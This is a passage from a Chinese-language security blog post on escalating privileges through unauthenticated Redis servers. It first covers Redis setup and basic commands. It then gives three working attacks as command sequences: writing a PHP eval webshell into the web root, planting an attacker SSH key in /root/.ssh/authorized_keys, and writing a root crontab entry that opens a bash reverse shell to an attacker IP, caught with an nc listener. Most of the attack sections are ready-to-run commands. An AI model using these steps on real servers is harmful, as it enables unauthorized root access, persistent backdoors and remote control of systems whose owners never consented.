<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs routeros">firewall-cmd <span class="hljs-attribute">--query-port</span>=6379/tcp<br>如果返回结果为<span class="hljs-literal">no</span>，那么证明6379端口确实没有开启。<br><br><br>输入<br>firewall-cmd <span class="hljs-attribute">--add-port</span>=6379/tcp<br>将6379端口开启，返回success<br><br><br>再次查询端口是否开放<br>firewall-cmd <span class="hljs-attribute">--query-port</span>=6379/tcp<br>返回结果为<span class="hljs-literal">yes</span><br></code></pre></td></tr></table></figure>



<h3 id="启动数据库"><a href="#启动数据库" class="headerlink" title="启动数据库"></a>启动数据库</h3><figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk">.<span class="hljs-regexp">/src/</span>redis-server  redis.conf<br></code></pre></td></tr></table></figure>





<h3 id="redis数据库基本命令"><a href="#redis数据库基本命令" class="headerlink" title="redis数据库基本命令"></a>redis数据库基本命令</h3><figure class="highlight accesslog"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs accesslog">连接数据库<br>redis-cli -h <span class="hljs-number">192</span>.<span class="hljs-number">168</span>.<span class="hljs-number">63</span>.<span class="hljs-number">130</span><br><br><br>查看一些具体信息<br><span class="hljs-number">192.168.63.130:6379</span>&gt;info<br><br><br>将变量x设置为text<br><span class="hljs-number">192.168.63.130:6379</span>&gt;set x <span class="hljs-string">&quot;test&quot;</span><br><br><br>查看所有键<br><span class="hljs-number">192.168.63.130:6379</span>&gt;KEYS *<br><br><br>获取默认的redis目录、和rdb文件名：可以在修改前先获取，然后走的时候再恢复<br><span class="hljs-number">192.168.63.130:6379</span>&gt;CONFIG GET dir<br><span class="hljs-number">192.168.63.130:6379</span>&gt;CONFIG GET dbfilename<br><br><br>删除整个数据库<br><span class="hljs-number">192.168.63.130:6379</span>&gt;flushall<br><br><br>启动Redis服务可以执行：<br>service redisd start<br> <br> <br>关闭服务<br>service redisd stop<br> <br> <br>重启服务<br>service redisd restart<br> <br> <br>在控制台进入redis客户端<br>redis-cli<br> <br><br></code></pre></td></tr></table></figure>

<p>尝试远程连接</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114153932963.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114153932963</span></p>
<h2 id="提权条件"><a href="#提权条件" class="headerlink" title="提权条件"></a>提权条件</h2><p>如果redis数据库配置不当，就会导致未授权访问漏洞</p>
<figure class="highlight armasm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs armasm"><span class="hljs-symbol">redis</span>数据库允许任意<span class="hljs-built_in">ip</span>访问，并且没有进行添加防火墙规则避免其他非信任来源<span class="hljs-built_in">ip</span>访问等相关安全策略<br></code></pre></td></tr></table></figure>

<p>否则就无法连接</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs">没有设置密码认证（默认为空），可以免密码远程登录数据库<br></code></pre></td></tr></table></figure>

<p>如果设置了密码，是可以连接的，但是无法执行命令</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114161310186.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114161310186</span></p>
<p>这里连接成功，但是执行操作，需要密码认证</p>
<h2 id="写入webshell提权"><a href="#写入webshell提权" class="headerlink" title="写入webshell提权"></a>写入webshell提权</h2><p>首先连接</p>
<p>然后在目录里面创建文件，写入webshell</p>
<figure class="highlight php-template"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs php-template"><span class="language-xml">config set dir /var/www/html/                #一般网站目录</span><br><span class="language-xml"></span><br><span class="language-xml">config set dbfilename shell.php               #创建shell文件</span><br><span class="language-xml"></span><br><span class="language-xml">set x &quot;\r\n\r\n</span><span class="language-php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>(@<span class="hljs-variable">$_POST</span>[<span class="hljs-string">&#x27;a&#x27;</span>]); <span class="hljs-meta">?&gt;</span></span><span class="language-xml">&quot;     #redis写入文件的会自带一些版本信息，\r\n\r\n是换行的意思</span><br><span class="language-xml"></span><br><span class="language-xml">save</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114163230964.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114163230964</span></p>
<p>去服务器查看</p>
<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114163300780.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114163300780</span></p>
<p>创建成功</p>
<p>此时就可以用蚁剑连接了</p>
<h2 id="SSH登录提权"><a href="#SSH登录提权" class="headerlink" title="SSH登录提权"></a>SSH登录提权</h2><h3 id="提权条件-1"><a href="#提权条件-1" class="headerlink" title="提权条件"></a>提权条件</h3><figure class="highlight xquery"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs xquery">在主机<span class="hljs-built_in">是root</span>用户的条件下，启动的redis数据库<br></code></pre></td></tr></table></figure>



<figure class="highlight jboss-cli"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs jboss-cli">服务器开放了SSH服务，而且允许使用密钥登录，即可远程写入一个公钥，直接登录远程服务器<br><br>服务端存在<span class="hljs-string">.ssh</span>目录并且有写入的权限<br></code></pre></td></tr></table></figure>





<h3 id="操作-6"><a href="#操作-6" class="headerlink" title="操作"></a>操作</h3><p>本地生成公钥</p>
<figure class="highlight ebnf"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs ebnf"><span class="hljs-attribute">ssh-keygen -t rsa</span><br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114180000255.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114180000255</span></p>
<p>进入.ssh目录，保存密钥到key.txt</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cd</span> ~/.ssh<br><br>(<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\n\n&quot;</span>;<span class="hljs-built_in">cat</span> id_rsa.pub;<span class="hljs-built_in">echo</span> -e <span class="hljs-string">&quot;\n\n&quot;</span>)&gt;key.txt<br></code></pre></td></tr></table></figure>



<p>将保存的公钥写入数据库</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs bash"><span class="hljs-built_in">cat</span> /root/.ssh/key.txt | redis-cli -h 靶机ip地址 -x <span class="hljs-built_in">set</span> pub        <span class="hljs-comment">#命名为pub</span><br></code></pre></td></tr></table></figure>



<p>查看是否写入成功</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs routeros"><span class="hljs-built_in">get</span> pub<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114180847597.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114180847597</span></p>
<p>设置路径、文件名</p>
<figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros">config <span class="hljs-built_in">set</span> dir  /root/.ssh<br><span class="hljs-built_in"></span><br><span class="hljs-built_in">config </span><span class="hljs-built_in">set</span> dbfilename authorized_keys <br><br>save<br></code></pre></td></tr></table></figure>



<p>然后就可以ssh远程连接了</p>
<figure class="highlight css"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs css">ssh ip地址<br><br>或者<br><br>ssh -<span class="hljs-selector-tag">i</span> id_rsa root<span class="hljs-keyword">@ip</span>地址<br></code></pre></td></tr></table></figure>

<p><img    class="lazyload" data-original="https://typora-1313982205.cos.ap-beijing.myqcloud.com/image-20230114202521056.png" src="data:image/gif;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAADUlEQVQImWNgYGBgAAAABQABh6FO1AAAAABJRU5ErkJggg=="   ><span class="image-caption">image-20230114202521056</span></p>
<p>成功</p>
<p>这最后一步ssh连接我卡了半天</p>
<p>首先我们要知道的是    PermitRootLogin    这个参数</p>
<figure class="highlight pgsql"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs pgsql">PermitRootLogin如果不设置，默认是yes,也就是root可以登录<br><br>如果设置<span class="hljs-keyword">without</span>-<span class="hljs-keyword">password</span> 那么root可以登录，但是不允许通过密码ssh登陆<br>如果设置<span class="hljs-keyword">no</span>, root不许登陆<br>如果设置forced-commands-<span class="hljs-keyword">only</span>，则可以登录，但是登陆后不能进入交互，而是执行指定的命令后 自动退出<br></code></pre></td></tr></table></figure>

<p>这个参数在<font color='red'>阿里云服务器默认是no</font>，在<font color='red'>腾讯云默认yes</font></p>
<p>该参数位置在</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs awk"><span class="hljs-regexp">/etc/</span>ssh/sshd_config<br></code></pre></td></tr></table></figure>



<p>另一个需要注意的点是</p>
<p>我们需要在攻击机的    /root/.ssh    目录下执行命令，否则不会成功</p>
<h3 id="总结-7"><a href="#总结-7" class="headerlink" title="总结"></a>总结</h3><p>shh登陆提权的要点是</p>
<p>首先就是需要开启ssh连接，对/root/.ssh目录有写权限</p>
<p>还有就是数据库没有设置密码，否则我们是写不进去的</p>
<p>还有就是个人觉得比较重要的就是，在主机是root用户的条件下，启动的redis数据库（电脑用户是root，并不是说redis数据库是root用户）</p>
<p>我们最终获得的权限，就是打开数据库那个用户的权限，如果权限比较低，用这种方法提权，就没有必要</p>
<h2 id="crontab计划任务提权"><a href="#crontab计划任务提权" class="headerlink" title="crontab计划任务提权"></a>crontab计划任务提权</h2><h3 id="原理-8"><a href="#原理-8" class="headerlink" title="原理"></a>原理</h3><p>在数据库中插入一条数据，将计划任务的内容作为value，key值随意，然后通过修改数据库的默认路径为目标主机计划任务的路径，把缓冲的数据保存在文件里，这样就可以在服务器端成功写入一个计划任务进行反弹shell。</p>
<h3 id="操作-7"><a href="#操作-7" class="headerlink" title="操作"></a>操作</h3><figure class="highlight routeros"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><code class="hljs routeros">redis-cli -h 192.168.244.128 -p 6379<br><span class="hljs-built_in">set</span> xxx <span class="hljs-string">&quot;\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/192.168.232.129/1111 0&gt;&amp;1\n\n&quot;</span><span class="hljs-built_in"></span><br><span class="hljs-built_in">config </span><span class="hljs-built_in">set</span> dir /var/spool/cron/crontabs/<span class="hljs-built_in"></span><br><span class="hljs-built_in">config </span><span class="hljs-built_in">set</span> dbfilename root<br>save<br></code></pre></td></tr></table></figure>

<p>然后开启nc监听</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">nc</span> -nlvp <span class="hljs-number">1111</span><br></code></pre></td></tr></table></figure>

<p>最后过一会就能收到监听</p>
<p>我是用ubuntu测试的，无法成功，只能用centos</p>
<p>原因</p>
<figure class="highlight awk"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><code class="hljs awk">因为默认redis写文件后是<span class="hljs-number">644</span>的权限，但ubuntu要求执行定时任务文件<span class="hljs-regexp">/var/</span>spool<span class="hljs-regexp">/cron/</span>crontabs<span class="hljs-regexp">/权限必须是600也就是-rw-------才会执行，否则会报错(root) INSECURE MODE (mode 0600 expected)，而Centos的定时任务文件/</span>var<span class="hljs-regexp">/spool/</span>cron/权限<span class="hljs-number">644</span>也能执行<br><br>因为redis保存RDB会存在乱码，在Ubuntu上会报错，而在Centos上不会报错<br><br>由于系统的不同，crontrab定时文件位置也会不同<br>Centos的定时任务文件在<span class="hljs-regexp">/var/</span>spool<span class="hljs-regexp">/cron/</span><br>Ubuntu定时任务文件在<span class="hljs-regexp">/var/</span>spool<span class="hljs-regexp">/cron/</span>crontabs/<br></code></pre></td></tr></table></figure>


      </section>
      <section class="extra">
        
        
        
  <ul class="tag-list" itemprop="keywords"><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E5%86%85%E7%BD%91%E5%AD%A6%E4%B9%A0/" rel="tag">内网学习</a></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87/" rel="tag">权限提升</a></li></ul> 

        
  <nav class="nav">
    <a href="/2023/03/02/BloodHound/"><i class="iconfont iconleft"></i>BloodHound</a>
    <a href="/2023/03/02/%E7%AB%AF%E5%8F%A3%E8%BD%AC%E5%8F%91%E4%B8%8E%E5%86%85%E7%BD%91%E4%BB%A3%E7%90%86/">端口转发与内网代理<i class="iconfont iconright"></i></a>
  </nav>

      </section>
      
        <section class="comments">
  
    <div class="btn" id="comments-btn">查看评论</div>
  
  
</section>
      
    </section>
  </div>
</article></div>
      <div class="col-xl-3">
        
          
  <aside class="toc-wrap">
    <h3 class="toc-title">文章目录：</h3>
    <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%B8%B8%E8%A7%81%E6%95%B0%E6%8D%AE%E5%BA%93%E7%AB%AF%E5%8F%A3%E5%8F%B7"><span class="toc-text">常见数据库端口号</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%95%B0%E6%8D%AE%E5%BA%93%E6%8F%90%E6%9D%83%E7%9A%84%E7%9B%AE%E7%9A%84"><span class="toc-text">数据库提权的目的</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8B%BF%E5%88%B0root%E6%9D%83%E9%99%90%E6%96%B9%E6%B3%95"><span class="toc-text">拿到root权限方法</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9F%A5%E7%9C%8B%E9%85%8D%E7%BD%AE%E6%96%87%E4%BB%B6"><span class="toc-text">查看配置文件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9C%AC%E5%9C%B0%E8%84%9A%E6%9C%AC%E7%88%86%E7%A0%B4"><span class="toc-text">本地脚本爆破</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%BF%9C%E7%A8%8B%E7%88%86%E7%A0%B4"><span class="toc-text">远程爆破</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MYSQL%E6%8F%90%E6%9D%83"><span class="toc-text">MYSQL提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#UDF%EF%BC%88user-defined-function%EF%BC%89%E6%8F%90%E6%9D%83"><span class="toc-text">UDF（user defined function）提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BD%BF%E7%94%A8%E6%9D%A1%E4%BB%B6"><span class="toc-text">使用条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%93%8D%E4%BD%9C"><span class="toc-text">提权操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MOF%E6%8F%90%E6%9D%83"><span class="toc-text">MOF提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%89%8B%E5%B7%A5%E6%8F%90%E6%9D%83"><span class="toc-text">手工提权</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%88%A9%E7%94%A8MSF%E8%BF%9B%E8%A1%8CMOF%E6%8F%90%E6%9D%83"><span class="toc-text">利用MSF进行MOF提权</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E9%A1%B9%E6%8F%90%E6%9D%83"><span class="toc-text">启动项提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-2"><span class="toc-text">原理</span></a></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#MSSQL%E6%8F%90%E6%9D%83"><span class="toc-text">MSSQL提权</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#MSSQL%E6%95%B0%E6%8D%AE%E5%BA%93%E5%AE%89%E8%A3%85"><span class="toc-text">MSSQL数据库安装</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MSSQL%E6%95%B0%E6%8D%AE%E5%BA%93%E4%BD%BF%E7%94%A8"><span class="toc-text">MSSQL数据库使用</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#xp-cmdshell%E6%8F%90%E6%9D%83"><span class="toc-text">xp_cmdshell提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-3"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%8C%83%E5%9B%B4"><span class="toc-text">范围</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C"><span class="toc-text">操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-3"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#sp-oacreate%E6%8F%90%E6%9D%83"><span class="toc-text">sp_oacreate提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-4"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6"><span class="toc-text">条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-1"><span class="toc-text">操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-4"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B2%99%E7%9B%92%E6%8F%90%E6%9D%83"><span class="toc-text">沙盒提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-5"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-2"><span class="toc-text">操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%97%95%E8%BF%B9%E6%B8%85%E7%90%86-1"><span class="toc-text">痕迹清理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-5"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JOB%E6%8F%90%E6%9D%83"><span class="toc-text">JOB提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-6"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-3"><span class="toc-text">操作</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%95%9C%E5%83%8F%E5%8A%AB%E6%8C%81%E6%8F%90%E6%9D%83"><span class="toc-text">镜像劫持提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-7"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%9D%A1%E4%BB%B6-1"><span class="toc-text">条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-4"><span class="toc-text">操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-6"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#MSSQL%E6%8F%90%E6%9D%83%E6%80%BB%E7%BB%93"><span class="toc-text">MSSQL提权总结</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#ORACLE"><span class="toc-text">ORACLE</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D-1"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-5"><span class="toc-text">操作</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#Redis"><span class="toc-text">Redis</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BB%8B%E7%BB%8D-2"><span class="toc-text">介绍</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%90%AD%E5%BB%BAredis%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">搭建redis数据库</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%AE%89%E8%A3%85redis%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">安装redis数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%AE%BE%E7%BD%AE%E8%BF%9C%E7%A8%8B%E8%AE%BF%E9%97%AE"><span class="toc-text">设置远程访问</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E7%AB%AF%E5%8F%A3%E5%8F%91%E6%94%BE"><span class="toc-text">端口发放</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%90%AF%E5%8A%A8%E6%95%B0%E6%8D%AE%E5%BA%93"><span class="toc-text">启动数据库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#redis%E6%95%B0%E6%8D%AE%E5%BA%93%E5%9F%BA%E6%9C%AC%E5%91%BD%E4%BB%A4"><span class="toc-text">redis数据库基本命令</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%9D%A1%E4%BB%B6"><span class="toc-text">提权条件</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%86%99%E5%85%A5webshell%E6%8F%90%E6%9D%83"><span class="toc-text">写入webshell提权</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#SSH%E7%99%BB%E5%BD%95%E6%8F%90%E6%9D%83"><span class="toc-text">SSH登录提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%8F%90%E6%9D%83%E6%9D%A1%E4%BB%B6-1"><span class="toc-text">提权条件</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-6"><span class="toc-text">操作</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%80%BB%E7%BB%93-7"><span class="toc-text">总结</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#crontab%E8%AE%A1%E5%88%92%E4%BB%BB%E5%8A%A1%E6%8F%90%E6%9D%83"><span class="toc-text">crontab计划任务提权</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E5%8E%9F%E7%90%86-8"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C-7"><span class="toc-text">操作</span></a></li></ol></li></ol></li></ol>
  </aside>

        
      </div>
    </div>
  </div>
</main>
  

<footer class="footer">
  <div class="footer-social"><a 
        href="https://github.com/lcharmy "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color= '#9f7be1'" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  icongithub-fill "></i>
      </a><a 
        href="mailto:lcharmy@163.com "
        target="_blank"
        class="footer-social-item"
        onMouseOver="this.style.color=#FF3B00" 
        onMouseOut="this.style.color='#33333D'">
          <i class="iconfont  iconmail"></i>
      </a></div>
  
    <div class="footer-copyright"><p>Powered by <a target="_blank" href="https://hexo.io">Hexo</a>  |  Theme - <a target="_blank" href="https://github.com/izhaoo/hexo-theme-zhaoo">zhaoo</a></p></div>
  
</footer>
  
      <div class="fab fab-plus">
    <i class="iconfont iconplus"></i>
  </div>
  
  
  
  <div class="fab fab-up">
    <i class="iconfont iconcaret-up"></i>
  </div>
  
  
  
    
<script src="/js/color-mode.js"></script>

  
  
    <div class="search">
  <div class="search-container">
    <div class="search-close">
      <i class="iconfont iconbaseline-close-px"></i>
    </div>
    <div class="search-input-wrapper">
      <i class="search-input-icon iconfont iconsearch"></i>
      <input class="search-input" type="search" id="search-input" placeholder="Search..." autofocus autocomplete="off"
        autocorrect="off" autocapitalize="off">
    </div>
    <div class="search-output" id="search-output"></div>
  </div>
</div>
  
</body>

<script src="https://code.jquery.com/jquery-3.6.0.min.js"></script>





  
<script src="https://cdn.bootcdn.net/ajax/libs/jquery.lazyload/1.9.1/jquery.lazyload.min.js"></script>




  
<script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.5.7/jquery.fancybox.min.js"></script>








<script src="/js/utils.js"></script>
<script src="/js/script.js"></script>







  <script>
    (function () {
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      } else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
    })();
  </script>













</html>